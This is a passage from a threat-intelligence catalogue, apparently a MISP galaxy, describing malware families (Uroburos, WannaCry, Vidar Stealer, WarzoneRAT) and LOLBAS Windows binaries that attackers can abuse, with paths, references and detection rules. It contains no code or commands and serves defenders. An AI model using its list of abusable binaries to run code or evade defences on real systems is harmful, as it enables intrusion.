A Linux rootkit that provides backdoor access and hides from defenders.
Internal MISP references
UUID 227c12df-8126-4e79-b9bd-0e4633fa12fa
which can be used as unique global reference for Umbreon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0221 |
source | MITRE |
type | ['malware'] |
Universal Virus Sniffer
Universal Virus Sniffer is a tool that can be used for impairing and evading an environment's defenses.[U.S. CISA Phobos February 29 2024]
Internal MISP references
UUID d876bb61-3122-44e7-ace4-f473a7b30f58
which can be used as unique global reference for Universal Virus Sniffer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5276 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e1af18e3-3224-4e4c-9d0f-533768474508'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Unknown Logger
Unknown Logger is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. [Forcepoint Monsoon]
Internal MISP references
UUID 846b3762-3949-4501-b781-6dca22db088f
which can be used as unique global reference for Unknown Logger
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0130 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Unregmp2
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Windows Media Player Setup Utility
Author: Wade Hickey
Paths: * C:\Windows\System32\unregmp2.exe * C:\Windows\SysWOW64\unregmp2.exe
Resources: * https://twitter.com/notwhickey/status/1466588365336293385
Detection:
* Sigma: proc_creation_win_lolbin_unregmp2.yml
* IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of unregmp2.exe /HideWMP
[Unregmp2.exe - LOLBAS Project]
Internal MISP references
UUID 456fb5b3-76e5-47f4-b964-09d68adb889e
which can be used as unique global reference for Unregmp2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5170 |
source | Tidal Cyber |
tags | ['40f11d0d-09f2-4bd1-bc79-1430464a52a7', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Update
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: Oddvar Moe
Paths: * %localappdata%\Microsoft\Teams\update.exe
Resources: * https://www.youtube.com/watch?v=rOP3hnkj7ls * https://twitter.com/reegun21/status/1144182772623269889 * https://twitter.com/MrUn1k0d3r/status/1143928885211537408 * https://twitter.com/reegun21/status/1291005287034281990 * http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ * https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12 * https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 * https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/
Detection: * Sigma: proc_creation_win_lolbin_squirrel.yml * IOC: Update.exe spawned an unknown process[Update.exe - LOLBAS Project]
Internal MISP references
UUID 487d4c42-12ee-4c90-b284-cca04dadb951
which can be used as unique global reference for Update
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5243 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
UPPERCUT
UPPERCUT is a backdoor that has been used by menuPass. [FireEye APT10 Sept 2018]
Internal MISP references
UUID a3c211f8-52aa-4bfd-8382-940f2194af28
which can be used as unique global reference for UPPERCUT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0275 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Url
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Internet Shortcut Shell Extension DLL.
Author: LOLBAS Team
Paths: * c:\windows\system32\url.dll * c:\windows\syswow64\url.dll
Resources: * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ * https://twitter.com/DissectMalware/status/995348436353470465 * https://twitter.com/bohops/status/974043815655956481 * https://twitter.com/yeyint_mth/status/997355558070927360 * https://twitter.com/Hexacorn/status/974063407321223168 * https://windows10dll.nirsoft.net/url_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Url.dll - LOLBAS Project]
Internal MISP references
UUID 96e24cc0-f1ce-4595-90c4-5a4976394db8
which can be used as unique global reference for Url
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5200 |
source | Tidal Cyber |
tags | ['34505028-b7d8-4da4-8dee-9926f3dbd37a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Uroburos
Uroburos is a sophisticated cyber espionage tool written in C that has been used by units within Russia's Federal Security Service (FSB) associated with the Turla toolset to collect intelligence on sensitive targets worldwide. Uroburos has several variants and has undergone nearly constant upgrade since its initial development in 2003 to keep it viable after public disclosures. Uroburos is typically deployed to external-facing nodes on a targeted network and has the ability to leverage additional tools and TTPs to further exploit an internal network. Uroburos has interoperable implants for Windows, Linux, and macOS, employs a high level of stealth in communications and architecture, and can easily incorporate new or replacement components.[Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023][Kaspersky Turla]
Internal MISP references
UUID 89ffc27c-b81f-473a-87d6-907cacdce61c
which can be used as unique global reference for Uroburos
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0022 |
source | MITRE |
tags | ['1efd43ee-5752-49f2-99fe-e3441f126b00'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ursnif
Ursnif is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, Spearphishing Attachments, and malicious links.[NJCCIC Ursnif Sept 2016][ProofPoint Ursnif Aug 2016] Ursnif is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[TrendMicro Ursnif Mar 2015]
Internal MISP references
UUID 3e501609-87e4-4c47-bd88-5054be0f1037
which can be used as unique global reference for Ursnif
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0386 |
source | MITRE |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
USBferry
USBferry is an information stealing malware and has been used by Tropic Trooper in targeted attacks against Taiwanese and Philippine air-gapped military environments. USBferry shares an overlapping codebase with YAHOYAH, though it has several features which makes it a distinct piece of malware.[TrendMicro Tropic Trooper May 2020]
Internal MISP references
UUID 26d93db8-dbc3-44b5-a393-2b219cef4f5b
which can be used as unique global reference for USBferry
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0452 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
USBStealer
USBStealer is malware that has been used by APT28 since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with ADVSTORESHELL. [ESET Sednit USBStealer 2014] [Kaspersky Sofacy]
Internal MISP references
UUID 50eab018-8d52-46f5-8252-95942c2c0a89
which can be used as unique global reference for USBStealer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0136 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
UtilityFunctions
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Paths: * C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Resources: * https://twitter.com/nickvangilder/status/1441003666274668546
Detection: * Sigma: proc_creation_win_lolbas_utilityfunctions.yml[UtilityFunctions.ps1 - LOLBAS Project]
Internal MISP references
UUID 50a57a6f-6597-42d1-b686-7003c631ddb0
which can be used as unique global reference for UtilityFunctions
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5262 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Valak
Valak is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.[Cybereason Valak May 2020][Unit 42 Valak July 2020]
Internal MISP references
UUID b149f12f-3cf4-4547-841d-c63b7677547d
which can be used as unique global reference for Valak
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0476 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
VaporRage
VaporRage is a shellcode downloader that has been used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021]
Internal MISP references
UUID 63940761-8dea-4362-8795-7bc0653ce1d4
which can be used as unique global reference for VaporRage
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0636 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Vasport
Vasport is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Vasport May 2012]
Internal MISP references
UUID fe116518-cd0c-4b10-8190-4f57208df4e4
which can be used as unique global reference for Vasport
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0207 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
vbc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary file used for compile vbs code
Author: Lior Adar
Paths: * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe * C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbin_visual_basic_compiler.yml * Elastic: defense_evasion_dotnet_compiler_parent_process.toml[vbc.exe - LOLBAS Project]
Internal MISP references
UUID 25ae056b-aa3d-4bfb-9b53-ba76bce0dad1
which can be used as unique global reference for vbc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5171 |
source | Tidal Cyber |
tags | ['bc6f5172-90af-491e-817d-2eaa522f93af', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
VBShower
VBShower is a backdoor that has been used by Inception since at least 2019. VBShower has been used as a downloader for second stage payloads, including PowerShower.[Kaspersky Cloud Atlas August 2019]
Internal MISP references
UUID 150b6079-bb10-48a8-b570-fbe8b0e3287c
which can be used as unique global reference for VBShower
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0442 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Venus Ransomware
A prominent ransomware family.[HC3 Analyst Note Venus Ransomware November 2022]
Internal MISP references
UUID 2f33ae13-8ab2-4ec1-8358-c81218c1f3a5
which can be used as unique global reference for Venus Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5293 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Verclsid
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to verify a COM object before it is instantiated by Windows Explorer
Author: @bohops
Paths: * C:\Windows\System32\verclsid.exe * C:\Windows\SysWOW64\verclsid.exe
Resources: * https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 * https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
Detection: * Sigma: proc_creation_win_verclsid_runs_com.yml * Splunk: verclsid_clsid_execution.yml[LOLBAS Verclsid]
Internal MISP references
UUID 56dc0bea-bdfb-4731-b6c0-425fb7f9bf4d
which can be used as unique global reference for Verclsid
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5172 |
source | Tidal Cyber |
tags | ['4e91036d-809b-4eae-8a09-86bdc6cd1f0e', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
VERMIN
VERMIN is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. [Unit 42 VERMIN Jan 2018]
Internal MISP references
UUID afa4023f-aa2e-45d6-bb3c-38e61f876eac
which can be used as unique global reference for VERMIN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0257 |
source | MITRE |
type | ['malware'] |
Vidar Stealer
Vidar Stealer is one of the most heavily used information & credential stealers ("infostealers") in recent years. While many of today's most popular infostealers were developed relatively recently, Vidar is more established, having been released in 2018. Its developers continue to add new capabilities, however, for example to improve the malware's stealth.[Minerva Labs Vidar Stealer Evasion]
More details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).
Internal MISP references
UUID ced8364c-e0e2-429a-a029-300fa2f0d5be
which can be used as unique global reference for Vidar Stealer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5071 |
source | Tidal Cyber |
tags | ['fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
VisualUiaVerifyNative
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
Author: Jimmy (@bohops)
Paths: * c:\Program Files (x86)\Windows Kits\10\bin[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe * c:\Program Files (x86)\Windows Kits\10\bin[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe * c:\Program Files (x86)\Windows Kits\10\bin[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
Resources: * https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ * https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_visualuiaverifynative.yml * IOC: As a Windows SDK binary, execution on a system may be suspicious[VisualUiaVerifyNative.exe - LOLBAS Project]
Internal MISP references
UUID acfbcd12-25fd-41cd-83ef-c7af7cb59fff
which can be used as unique global reference for VisualUiaVerifyNative
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5246 |
source | Tidal Cyber |
tags | ['5e096dac-47b7-4657-a57b-752ef7da0263', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Volgmer
Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. [US-CERT Volgmer Nov 2017]
Internal MISP references
UUID 7fcfba45-5752-4f0c-8023-db67729ae34e
which can be used as unique global reference for Volgmer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0180 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
VSDiagnostics
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Command-line tool used for performing diagnostics.
Author: Bobby Cooke
Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
Resources: * https://twitter.com/0xBoku/status/1679200664013135872
Detection: * Sigma: https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml[VSDiagnostics.exe - LOLBAS Project]
Internal MISP references
UUID fca6d378-bbe6-4418-b238-6a9a63aaabba
which can be used as unique global reference for VSDiagnostics
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5244 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Vshadow
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies.
Author: Ayberk Halaç
Paths: * C:\Program Files (x86)\Windows Kits\10\bin\10.0.XXXXX.0\x64\vshadow.exe
Resources: * https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample
Detection: * IOC: vshadow.exe usage with -exec parameter[Vshadow.exe - LOLBAS Project]
Internal MISP references
UUID f39988b4-acf7-4d56-a7e5-8e8fa0b8ccc2
which can be used as unique global reference for Vshadow
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5247 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
VSIISExeLauncher
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: timwhite
Paths: * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe
Resources: * https://github.com/timwhitez
Detection: * Sigma: proc_creation_win_lolbin_vsiisexelauncher.yml * IOC: VSIISExeLauncher.exe spawned an unknown process[VSIISExeLauncher.exe - LOLBAS Project]
Internal MISP references
UUID 2517da5a-11b1-4f77-b488-c096173b1b50
which can be used as unique global reference for VSIISExeLauncher
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5245 |
source | Tidal Cyber |
tags | ['0bf195a2-c577-4317-973e-a72dde5a06e6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
vsjitdebugger
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Just-In-Time (JIT) debugger included with Visual Studio
Author: Oddvar Moe
Paths: * c:\windows\system32\vsjitdebugger.exe
Resources: * https://twitter.com/pabraeken/status/990758590020452353
Detection: * Sigma: proc_creation_win_susp_use_of_vsjitdebugger_bin.yml[vsjitdebugger.exe - LOLBAS Project]
Internal MISP references
UUID 34ba500e-c37c-45ec-abf4-16e2f76d82c8
which can be used as unique global reference for vsjitdebugger
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5248 |
source | Tidal Cyber |
tags | ['71bc284c-bfce-4191-80e0-ef70ff4315bf', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
vsls-agent
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Agent for Visual Studio Live Share (Code Collaboration)
Author: Jimmy (@bohops)
Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
Resources: * https://twitter.com/bohops/status/1583916360404729857
Detection: * Sigma: proc_creation_win_vslsagent_agentextensionpath_load.yml[vsls-agent.exe - LOLBAS Project]
Internal MISP references
UUID 99f752db-12c4-45a7-9f7b-f4fcda033462
which can be used as unique global reference for vsls-agent
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5253 |
source | Tidal Cyber |
tags | ['375cb8ad-2b6a-49b7-8eb3-757aaaf72d8b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
VSS Copying Tool (Play Ransomware)
Play ransomware operators are known to use a custom tool that serves as an interface for interacting with Windows Volume Shadow Copy Service ("VSS") over APIs. The tool can enumerate and copy files and folders in a VSS snapshot prior to encryption to serve as backups.[Symantec Play Ransomware April 19 2023]
Internal MISP references
UUID a3ebc075-c87b-4400-9498-09bb95d47231
which can be used as unique global reference for VSS Copying Tool (Play Ransomware)
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5301 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '4d767e87-4cf6-438a-927a-43d2d0beaab7', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
vstest.console
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: VSTest.Console.exe is the command-line tool to run tests
Author: Onat Uzunyayla
Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe * C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
Resources: * https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022
Detection: * IOC: vstest.console.exe spawning unexpected processes[vstest.console.exe - LOLBAS Project]
Internal MISP references
UUID dfbe173f-5c36-4596-aefb-7ccf504e03c8
which can be used as unique global reference for vstest.console
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5254 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Wab
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows address book manager
Author: Oddvar Moe
Paths: * C:\Program Files\Windows Mail\wab.exe * C:\Program Files (x86)\Windows Mail\wab.exe
Resources: * https://twitter.com/Hexacorn/status/991447379864932352 * http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
Detection: * Sigma: registry_set_wab_dllpath_reg_change.yml * IOC: WAB.exe should normally never be used[Wab.exe - LOLBAS Project]
Internal MISP references
UUID 6cbd62e8-9024-42d7-93d5-6b8b3409425b
which can be used as unique global reference for Wab
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5173 |
source | Tidal Cyber |
tags | ['a53c9f4b-6f0d-4afa-b1ac-8e2d91279210', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
WannaCry
WannaCry is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.[LogRhythm WannaCry][US-CERT WannaCry 2017][Washington Post WannaCry 2017][FireEye WannaCry 2017]
Internal MISP references
UUID 6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a
which can be used as unique global reference for WannaCry
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0366 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', '45795633-a32b-4d9e-8620-4044ac056647', '09de661e-60c4-43fb-bfef-df017215d1d8', '5a463cb3-451d-47f7-93e4-1886150697ce', 'c2380542-36f2-4922-9ed2-80ced06645c9', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172', 'e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WARPWIRE
WARPWIRE is a Javascript credential stealer that targets plaintext passwords and usernames for exfiltration that was used during Cutting Edge to target Ivanti Connect Secure VPNs.[Mandiant Cutting Edge January 2024][Mandiant Cutting Edge Part 2 January 2024]
Internal MISP references
UUID 9a592b49-1701-5e4c-95cf-9b8c98b80527
which can be used as unique global reference for WARPWIRE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1116 |
source | MITRE |
type | ['malware'] |
WarzoneRAT
WarzoneRAT is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.[Check Point Warzone Feb 2020][Uptycs Warzone UAC Bypass November 2020]
Internal MISP references
UUID cfebe868-15cb-4be5-b7ed-38b52f2a0722
which can be used as unique global reference for WarzoneRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0670 |
source | MITRE |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WastedLocker
WastedLocker is a ransomware family attributed to Indrik Spider that has been used since at least May 2020. WastedLocker has been used against a broad variety of sectors, including manufacturing, information technology, and media.[Symantec WastedLocker June 2020][NCC Group WastedLocker June 2020][Sentinel Labs WastedLocker July 2020]
Internal MISP references
UUID 0ba6ee8d-2b29-4980-8e55-348ea05f00ad
which can be used as unique global reference for WastedLocker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0612 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Waterbear
Waterbear is modular malware attributed to BlackTech that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.[Trend Micro Waterbear December 2019]
Internal MISP references
UUID 56872a5b-dc01-455c-85d5-06c577abb030
which can be used as unique global reference for Waterbear
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0579 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
WEBC2
WEBC2 is a family of backdoor malware used by APT1 as early as July 2006. WEBC2 backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. [Mandiant APT1 Appendix][Mandiant APT1]
Internal MISP references
UUID f228af8f-8938-4836-9461-c6ca220ed7c5
which can be used as unique global reference for WEBC2
in MISP communities and other software using the MISP galaxy
Associated metadata
